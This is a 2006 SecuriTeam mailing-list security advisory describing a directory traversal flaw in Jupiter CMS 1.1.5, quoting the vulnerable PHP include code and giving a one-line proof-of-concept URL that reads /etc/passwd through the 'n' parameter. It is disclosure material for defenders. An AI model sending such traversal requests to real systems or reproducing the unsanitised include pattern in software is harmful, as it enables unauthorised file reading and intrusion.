[UNIX] Jupiter CMS Directory Traversal
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 2 May 2006 10:27:57 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Jupiter CMS Directory Traversal
------------------------------------------------------------------------
SUMMARY
" <http://www.highstrike.net/> Jupiter is a content management system."
Improper validation of file path allow attackers to include arbitrary
files in Jupiter CMS.
DETAILS
Vulnerable Systems:
* Jupiter CMS version 1.1.5
Input passed to the "n" parameter in "index.php" isn't properly verified,
before it is used to include files.
Vulnerable Code:
index.php line 592
//-----------------------------------------------------------------
// PHP Navigation
//-----------------------------------------------------------------
if(!isset($n) && $i != 2 && $i != 17 && $i != "error")
include("modules/news.php");
if(isset($n))
{
if(file_exists("$n.php")) include("$n.php");
elseif(!file_exists("$n.php"))
header("location: $PHP_SELF?i=error");
}
//-----------------------------------------------------------------
Proof of Concept:
http://localhost/Jupiter/index.php?n=/../../../../../../../../../../etc/passwd%00
ADDITIONAL INFORMATION
The information has been provided by <mailto:het_ebadi@xxxxxxxxx> h e.
The original article can be found at:
<http://www.hamid.ir/security/jupiter.txt>
http://www.hamid.ir/security/jupiter.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NEWS] Cisco Unity Express Privilege Escalation
- Next by Date: [TOOL] SWCS - Silent CGI Web Shell
- Previous by thread: [NEWS] Cisco Unity Express Privilege Escalation
- Next by thread: [TOOL] SWCS - Silent CGI Web Shell
- Index(es):
Relevant Pages
|
|